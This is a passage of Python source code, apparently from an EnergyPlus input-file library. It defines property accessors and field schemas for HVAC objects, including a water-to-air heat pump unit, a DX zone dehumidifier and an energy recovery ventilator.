    return self["Air Outlet Node Name"]

@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
    """Set IDD field `Air Outlet Node Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
    """Current value of IDD field `Outdoor Air Mixer Object Type`.

    | Currently only one OutdoorAir:Mixer object type is available.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Outdoor Air Mixer Object Type"]

@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
    """Set IDD field `Outdoor Air Mixer Object Type`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
    """Current value of IDD field `Outdoor Air Mixer Name`.

    | This optional field specifies the name of the outdoor air mixer object.
    | When used, this name needs to match name of outdoor air mixer object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Outdoor Air Mixer Name"]

@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
    """Set IDD field `Outdoor Air Mixer Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Outdoor Air Mixer Name"] = value
@property
def cooling_supply_air_flow_rate(self):
    """Current value of IDD field `Cooling Supply Air Flow Rate`.

    | Must be less than or equal to fan size.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Cooling Supply Air Flow Rate"]

@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
    """Set IDD field `Cooling Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate(self):
    """Current value of IDD field `Heating Supply Air Flow Rate`.

    | Must be less than or equal to fan size.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Heating Supply Air Flow Rate"]

@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
    """Set IDD field `Heating Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Supply Air Flow Rate"] = value
@property
def no_load_supply_air_flow_rate(self):
    """Current value of IDD field `No Load Supply Air Flow Rate`.

    | Must be less than or equal to fan size.
    | Only used when heat pump fan operating mode is continuous. This air flow rate
    | is used when no heating or cooling is required and the DX coil compressor is off.
    | If this field is left blank or zero, the supply air flow rate from the previous
    | on cycle (either cooling or heating) is used.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["No Load Supply Air Flow Rate"]

@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
    """Set IDD field `No Load Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["No Load Supply Air Flow Rate"] = value
@property
def cooling_outdoor_air_flow_rate(self):
    """Current value of IDD field `Cooling Outdoor Air Flow Rate`.

    | Must be less than or equal to supply air flow rate during cooling operation.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Cooling Outdoor Air Flow Rate"]

@cooling_outdoor_air_flow_rate.setter
def cooling_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `Cooling Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Cooling Outdoor Air Flow Rate"] = value
@property
def heating_outdoor_air_flow_rate(self):
    """Current value of IDD field `Heating Outdoor Air Flow Rate`.

    | Must be less than or equal to supply air flow rate during heating operation.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Heating Outdoor Air Flow Rate"]

@heating_outdoor_air_flow_rate.setter
def heating_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `Heating Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Outdoor Air Flow Rate"] = value
@property
def no_load_outdoor_air_flow_rate(self):
    """Current value of IDD field `No Load Outdoor Air Flow Rate`.

    | Only used when heat pump Fan operating mode is continuous. This air flow rate
    | is used when no heating or cooling is required and the DX coil compressor is off.
    | If this field is left blank or zero, the outdoor air flow rate from the previous
    | on cycle (either cooling or heating) is used.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["No Load Outdoor Air Flow Rate"]

@no_load_outdoor_air_flow_rate.setter
def no_load_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `No Load Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["No Load Outdoor Air Flow Rate"] = value
@property
def supply_air_fan_object_type(self):
    """Current value of IDD field `Supply Air Fan Object Type`.

    | Only works with On/Off Fan

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supply Air Fan Object Type"]

@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
    """Set IDD field `Supply Air Fan Object Type`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
    """Current value of IDD field `Supply Air Fan Name`.

    | Needs to match Fan:OnOff object

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supply Air Fan Name"]

@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
    """Set IDD field `Supply Air Fan Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supply Air Fan Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
| Needs to match in the water-to-air heat pump heating coil object
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
| Needs to match in the water-to-air heat pump cooling coil object
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def maximum_cycling_rate(self):
"""field `Maximum Cycling Rate`
| The maximum on-off cycling rate for the compressor
| Suggested value is 2.5 for a typical heat pump
| Units: cycles/hr
| Default value: 2.5
| value <= 5.0
Args:
value (float): value for IDD Field `Maximum Cycling Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_cycling_rate` or None if not set
"""
return self["Maximum Cycling Rate"]
@maximum_cycling_rate.setter
def maximum_cycling_rate(self, value=2.5):
"""Corresponds to IDD field `Maximum Cycling Rate`"""
self["Maximum Cycling Rate"] = value
@property
def heat_pump_time_constant(self):
"""field `Heat Pump Time Constant`
| Time constant for the cooling coil's capacity to reach steady state after startup
| Suggested value is 60 for a typical heat pump
| Units: s
| Default value: 60.0
| value <= 500.0
Args:
value (float): value for IDD Field `Heat Pump Time Constant`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heat_pump_time_constant` or None if not set
"""
return self["Heat Pump Time Constant"]
@heat_pump_time_constant.setter
def heat_pump_time_constant(self, value=60.0):
"""Corresponds to IDD field `Heat Pump Time Constant`"""
self["Heat Pump Time Constant"] = value
@property
def fraction_of_oncycle_power_use(self):
"""field `Fraction of On-Cycle Power Use`
| The fraction of on-cycle power use to adjust the part load fraction based on
| the off-cycle power consumption due to crankcase heaters, controls, fans, and etc.
| Suggested value is 0.01 for a typical heat pump
| Default value: 0.01
| value <= 0.05
Args:
value (float): value for IDD Field `Fraction of On-Cycle Power Use`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_oncycle_power_use` or None if not set
"""
return self["Fraction of On-Cycle Power Use"]
@fraction_of_oncycle_power_use.setter
def fraction_of_oncycle_power_use(self, value=0.01):
""" Corresponds to IDD field `Fraction of On-Cycle Power Use`
"""
self["Fraction of On-Cycle Power Use"] = value
@property
def heat_pump_fan_delay_time(self):
"""field `Heat Pump Fan Delay Time`
| Programmed time delay for heat pump fan to shut off after compressor cycle off.
| Only required when fan operating mode is cycling
| Enter 0 when fan operating mode is continuous
| Units: s
| Default value: 60.0
Args:
value (float): value for IDD Field `Heat Pump Fan Delay Time`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heat_pump_fan_delay_time` or None if not set
"""
return self["Heat Pump Fan Delay Time"]
@heat_pump_fan_delay_time.setter
def heat_pump_fan_delay_time(self, value=60.0):
"""Corresponds to IDD field `Heat Pump Fan Delay Time`"""
self["Heat Pump Fan Delay Time"] = value
@property
def supplemental_heating_coil_object_type(self):
"""field `Supplemental Heating Coil Object Type`
| works with gas, electric, hot water and steam heating coils
Args:
value (str): value for IDD Field `Supplemental Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supplemental_heating_coil_object_type` or None if not set
"""
return self["Supplemental Heating Coil Object Type"]
@supplemental_heating_coil_object_type.setter
def supplemental_heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Supplemental Heating Coil Object Type`"""
self["Supplemental Heating Coil Object Type"] = value
@property
def supplemental_heating_coil_name(self):
"""field `Supplemental Heating Coil Name`
| Needs to match in the supplemental heating coil object
Args:
value (str): value for IDD Field `Supplemental Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supplemental_heating_coil_name` or None if not set
"""
return self["Supplemental Heating Coil Name"]
@supplemental_heating_coil_name.setter
def supplemental_heating_coil_name(self, value=None):
"""Corresponds to IDD field `Supplemental Heating Coil Name`"""
self["Supplemental Heating Coil Name"] = value
@property
def maximum_supply_air_temperature_from_supplemental_heater(self):
"""field `Maximum Supply Air Temperature from Supplemental Heater`
| Units: C
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Temperature from Supplemental Heater`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_temperature_from_supplemental_heater` or None if not set
"""
return self["Maximum Supply Air Temperature from Supplemental Heater"]
@maximum_supply_air_temperature_from_supplemental_heater.setter
def maximum_supply_air_temperature_from_supplemental_heater(
self,
value=None):
"""Corresponds to IDD field `Maximum Supply Air Temperature from
Supplemental Heater`"""
self["Maximum Supply Air Temperature from Supplemental Heater"] = value
@property
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(
self):
"""field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
| Units: C
| Default value: 21.0
| value <= 21.0
Args:
value (float): value for IDD Field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation` or None if not set
"""
return self[
"Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"]
@maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation.setter
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(
self,
value=21.0):
""" Corresponds to IDD field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`
"""
self[
"Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"] = value
@property
def outdoor_drybulb_temperature_sensor_node_name(self):
"""field `Outdoor Dry-Bulb Temperature Sensor Node Name`
Args:
value (str): value for IDD Field `Outdoor Dry-Bulb Temperature Sensor Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_drybulb_temperature_sensor_node_name` or None if not set
"""
return self["Outdoor Dry-Bulb Temperature Sensor Node Name"]
@outdoor_drybulb_temperature_sensor_node_name.setter
def outdoor_drybulb_temperature_sensor_node_name(self, value=None):
""" Corresponds to IDD field `Outdoor Dry-Bulb Temperature Sensor Node Name`
"""
self["Outdoor Dry-Bulb Temperature Sensor Node Name"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
| Default value: BlowThrough
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value="BlowThrough"):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule values of 0 denote
| cycling fan operation (fan cycles with cooling or heating coil). Schedule values greater
| than 0 denote constant fan operation (fan runs continually regardless of coil operation).
| The fan operating mode defaults to cycling fan operation if this field is left blank.
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def heat_pump_coil_water_flow_mode(self):
"""field `Heat Pump Coil Water Flow Mode`
| used only when the heat pump coils are of the type WaterToAirHeatPump:EquationFit
| Constant results in 100% water flow regardless of compressor PLR
| Cycling results in water flow that matches compressor PLR
| ConstantOnDemand results in 100% water flow whenever the coil is on, but is 0% whenever the coil has no load
| Default value: Cycling
Args:
value (str): value for IDD Field `Heat Pump Coil Water Flow Mode`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heat_pump_coil_water_flow_mode` or None if not set
"""
return self["Heat Pump Coil Water Flow Mode"]
@heat_pump_coil_water_flow_mode.setter
def heat_pump_coil_water_flow_mode(self, value="Cycling"):
"""Corresponds to IDD field `Heat Pump Coil Water Flow Mode`"""
self["Heat Pump Coil Water Flow Mode"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacDehumidifierDx(DataObject):

    """Corresponds to IDD object `ZoneHVAC:Dehumidifier:DX`.

    Calculates the performance of zone (room) air dehumidifiers.  Meant
    to model conventional direct expansion (DX) cooling-based room air
    dehumidifiers (reject 100% of condenser heat to the zone air), but
    this object might be able to be used to model other room air
    dehumidifier types.
    """

    # IDD schema: field order, requiredness, limits and units for this object.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'availability schedule name',
             {'name': u'Availability Schedule Name',
              'pyname': u'availability_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'air inlet node name',
             {'name': u'Air Inlet Node Name',
              'pyname': u'air_inlet_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'air outlet node name',
             {'name': u'Air Outlet Node Name',
              'pyname': u'air_outlet_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'rated water removal',
             {'name': u'Rated Water Removal',
              'pyname': u'rated_water_removal',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'L/day'}),
            (u'rated energy factor',
             {'name': u'Rated Energy Factor',
              'pyname': u'rated_energy_factor',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'L/kWh'}),
            (u'rated air flow rate',
             {'name': u'Rated Air Flow Rate',
              'pyname': u'rated_air_flow_rate',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm3/s'}),
            (u'water removal curve name',
             {'name': u'Water Removal Curve Name',
              'pyname': u'water_removal_curve_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'energy factor curve name',
             {'name': u'Energy Factor Curve Name',
              'pyname': u'energy_factor_curve_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'part load fraction correlation curve name',
             {'name': u'Part Load Fraction Correlation Curve Name',
              'pyname': u'part_load_fraction_correlation_curve_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'minimum dry-bulb temperature for dehumidifier operation',
             {'name': u'Minimum Dry-Bulb Temperature for Dehumidifier Operation',
              'pyname': u'minimum_drybulb_temperature_for_dehumidifier_operation',
              'default': 10.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'C'}),
            (u'maximum dry-bulb temperature for dehumidifier operation',
             {'name': u'Maximum Dry-Bulb Temperature for Dehumidifier Operation',
              'pyname': u'maximum_drybulb_temperature_for_dehumidifier_operation',
              'default': 35.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'C'}),
            (u'off-cycle parasitic electric load',
             {'name': u'Off-Cycle Parasitic Electric Load',
              'pyname': u'offcycle_parasitic_electric_load',
              'default': 0.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'W'}),
            (u'condensate collection water storage tank name',
             {'name': u'Condensate Collection Water Storage Tank Name',
              'pyname': u'condensate_collection_water_storage_tank_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'})]),
        'format': None,
        'group': u'Zone HVAC Forced Air Units',
        'min-fields': 13,
        'name': u'ZoneHVAC:Dehumidifier:DX',
        'pyname': u'ZoneHvacDehumidifierDx',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """IDD field `Name`.

        | Unique name for this direct expansion (DX) zone dehumidifier object.

        Returns:
            str: the value of `name` or None if not set
        """
        key = "Name"
        return self[key]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Name"
        self[key] = value

    @property
    def availability_schedule_name(self):
        """IDD field `Availability Schedule Name`.

        | Availability schedule name for this system. Schedule value > 0 means the system is available.
        | If this field is blank, the system is always available.
        | Schedule values of 0 denote the unit is off.
        | Schedule values >0.0 (usually 1.0) indicate that the dehumidifier is available to operate.

        Returns:
            str: the value of `availability_schedule_name` or None if not set
        """
        key = "Availability Schedule Name"
        return self[key]

    @availability_schedule_name.setter
    def availability_schedule_name(self, value=None):
        """Set IDD field `Availability Schedule Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Availability Schedule Name"
        self[key] = value

    @property
    def air_inlet_node_name(self):
        """IDD field `Air Inlet Node Name`.

        | Air inlet node for the dehumidifier must be a zone air exhaust node.

        Returns:
            str: the value of `air_inlet_node_name` or None if not set
        """
        key = "Air Inlet Node Name"
        return self[key]

    @air_inlet_node_name.setter
    def air_inlet_node_name(self, value=None):
        """Set IDD field `Air Inlet Node Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Air Inlet Node Name"
        self[key] = value

    @property
    def air_outlet_node_name(self):
        """IDD field `Air Outlet Node Name`.

        | Air outlet node for the dehumidifier must be a zone air inlet node.

        Returns:
            str: the value of `air_outlet_node_name` or None if not set
        """
        key = "Air Outlet Node Name"
        return self[key]

    @air_outlet_node_name.setter
    def air_outlet_node_name(self, value=None):
        """Set IDD field `Air Outlet Node Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Air Outlet Node Name"
        self[key] = value

    @property
    def rated_water_removal(self):
        """IDD field `Rated Water Removal`.

        | Rating point: air entering dehumidifier at 26.7 C (80 F) dry-bulb and 60% relative humidity.
        | Units: L/day

        Returns:
            float: the value of `rated_water_removal` or None if not set
        """
        key = "Rated Water Removal"
        return self[key]

    @rated_water_removal.setter
    def rated_water_removal(self, value=None):
        """Set IDD field `Rated Water Removal`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Rated Water Removal"
        self[key] = value

    @property
    def rated_energy_factor(self):
        """IDD field `Rated Energy Factor`.

        | Rating point: air entering dehumidifier at 26.7 C (80 F) dry-bulb and 60% relative humidity.
        | Units: L/kWh

        Returns:
            float: the value of `rated_energy_factor` or None if not set
        """
        key = "Rated Energy Factor"
        return self[key]

    @rated_energy_factor.setter
    def rated_energy_factor(self, value=None):
        """Set IDD field `Rated Energy Factor`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Rated Energy Factor"
        self[key] = value

    @property
    def rated_air_flow_rate(self):
        """IDD field `Rated Air Flow Rate`.

        | Units: m3/s

        Returns:
            float: the value of `rated_air_flow_rate` or None if not set
        """
        key = "Rated Air Flow Rate"
        return self[key]

    @rated_air_flow_rate.setter
    def rated_air_flow_rate(self, value=None):
        """Set IDD field `Rated Air Flow Rate`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Rated Air Flow Rate"
        self[key] = value

    @property
    def water_removal_curve_name(self):
        """IDD field `Water Removal Curve Name`.

        | Name of a curve that describes the water removal rate (normalized to rated conditions)
        | as a function of the dry-bulb temperature and relative humidity of the air
        | entering the dehumidifier.
        | Curve output = (actual water removal/rated water removal) = a + b*T + c*T**2 + d*RH +
        | e*RH**2 + f*T*RH
        | T = inlet air dry-bulb temperature (C)
        | RH = inlet air RH (%)

        Returns:
            str: the value of `water_removal_curve_name` or None if not set
        """
        key = "Water Removal Curve Name"
        return self[key]

    @water_removal_curve_name.setter
    def water_removal_curve_name(self, value=None):
        """Set IDD field `Water Removal Curve Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Water Removal Curve Name"
        self[key] = value

    @property
    def energy_factor_curve_name(self):
        """IDD field `Energy Factor Curve Name`.

        | Name of a curve that describes the energy factor (normalized to rated conditions)
        | as a function of the dry-bulb temperature and relative humidity of the air
        | entering the dehumidifier.
        | Curve output = (actual energy factor/rated energy factor) = a + b*T + c*T**2 + d*RH +
        | e*RH**2 + f*T*RH
        | T = inlet air dry-bulb temperature (C)
        | RH = inlet air RH (%)

        Returns:
            str: the value of `energy_factor_curve_name` or None if not set
        """
        key = "Energy Factor Curve Name"
        return self[key]

    @energy_factor_curve_name.setter
    def energy_factor_curve_name(self, value=None):
        """Set IDD field `Energy Factor Curve Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Energy Factor Curve Name"
        self[key] = value

    @property
    def part_load_fraction_correlation_curve_name(self):
        """IDD field `Part Load Fraction Correlation Curve Name`.

        | Name of a curve that describes the part load fraction (PLF) of the system as
        | a function of the part load ratio. Used to calculate dehumidifier run time fraction
        | and electric power.
        | quadratic curve = a + b*PLR + c*PLR**2
        | cubic curve = a + b*PLR + c*PLR**2 + d*PLR**3
        | PLR = part load ratio (dehumidification load/steady state water removal capacity)

        Returns:
            str: the value of `part_load_fraction_correlation_curve_name` or None if not set
        """
        key = "Part Load Fraction Correlation Curve Name"
        return self[key]

    @part_load_fraction_correlation_curve_name.setter
    def part_load_fraction_correlation_curve_name(self, value=None):
        """Set IDD field `Part Load Fraction Correlation Curve Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Part Load Fraction Correlation Curve Name"
        self[key] = value

    @property
    def minimum_drybulb_temperature_for_dehumidifier_operation(self):
        """IDD field `Minimum Dry-Bulb Temperature for Dehumidifier Operation`.

        | Dehumidifier shut off if inlet air (zone) temperature is below this value.
        | This value must be less than the Maximum Dry-Bulb Temperature for Dehumidifier Operation.
        | Units: C
        | Default value: 10.0

        Returns:
            float: the value of `minimum_drybulb_temperature_for_dehumidifier_operation`
            or None if not set
        """
        key = "Minimum Dry-Bulb Temperature for Dehumidifier Operation"
        return self[key]

    @minimum_drybulb_temperature_for_dehumidifier_operation.setter
    def minimum_drybulb_temperature_for_dehumidifier_operation(
            self, value=10.0):
        """Set IDD field `Minimum Dry-Bulb Temperature for Dehumidifier Operation`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Minimum Dry-Bulb Temperature for Dehumidifier Operation"
        self[key] = value

    @property
    def maximum_drybulb_temperature_for_dehumidifier_operation(self):
        """IDD field `Maximum Dry-Bulb Temperature for Dehumidifier Operation`.

        | Dehumidifier shut off if inlet air (zone) temperature is above this value.
        | This value must be greater than the Minimum Dry-Bulb Temperature for Dehumidifier Operation.
        | Units: C
        | Default value: 35.0

        Returns:
            float: the value of `maximum_drybulb_temperature_for_dehumidifier_operation`
            or None if not set
        """
        key = "Maximum Dry-Bulb Temperature for Dehumidifier Operation"
        return self[key]

    @maximum_drybulb_temperature_for_dehumidifier_operation.setter
    def maximum_drybulb_temperature_for_dehumidifier_operation(
            self, value=35.0):
        """Set IDD field `Maximum Dry-Bulb Temperature for Dehumidifier Operation`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Maximum Dry-Bulb Temperature for Dehumidifier Operation"
        self[key] = value

    @property
    def offcycle_parasitic_electric_load(self):
        """IDD field `Off-Cycle Parasitic Electric Load`.

        | Parasitic electric power consumed when the dehumidifier is available to operate, but
        | does not operate (i.e., no high humidity load to be met).
        | Off cycle parasitic power is 0 when the availability schedule is 0.
        | This electric load is considered as a heat gain to the zone air.
        | Units: W

        Returns:
            float: the value of `offcycle_parasitic_electric_load` or None if not set
        """
        key = "Off-Cycle Parasitic Electric Load"
        return self[key]

    @offcycle_parasitic_electric_load.setter
    def offcycle_parasitic_electric_load(self, value=None):
        """Set IDD field `Off-Cycle Parasitic Electric Load`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Off-Cycle Parasitic Electric Load"
        self[key] = value

    @property
    def condensate_collection_water_storage_tank_name(self):
        """IDD field `Condensate Collection Water Storage Tank Name`.

        | Name of storage tank used to collect water removed by the dehumidifier.

        Returns:
            str: the value of `condensate_collection_water_storage_tank_name` or None if not set
        """
        key = "Condensate Collection Water Storage Tank Name"
        return self[key]

    @condensate_collection_water_storage_tank_name.setter
    def condensate_collection_water_storage_tank_name(self, value=None):
        """Set IDD field `Condensate Collection Water Storage Tank Name`.

        Raises:
            ValueError: if `value` is not a valid value
        """
        key = "Condensate Collection Water Storage Tank Name"
        self[key] = value
class ZoneHvacEnergyRecoveryVentilator(DataObject):
""" Corresponds to IDD object `ZoneHVAC:EnergyRecoveryVentilator`
This compound component models a stand-alone energy recovery ventilator (ERV)
that conditions outdoor ventilation air and supplies that air directly to a zone.
The ERV unit is modeled as a collection of components: air-to-air heat exchanger,
supply air fan, exhaust air fan and an optional controller to avoid overheating
of the supply air (economizer or free cooling operation).
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heat exchanger name',
{'name': u'Heat Exchanger Name',
'pyname': u'heat_exchanger_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air flow rate',
{'name': u'Supply Air Flow Rate',
'pyname': u'supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'exhaust air flow rate',
{'name': u'Exhaust Air Flow Rate',
'pyname': u'exhaust_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
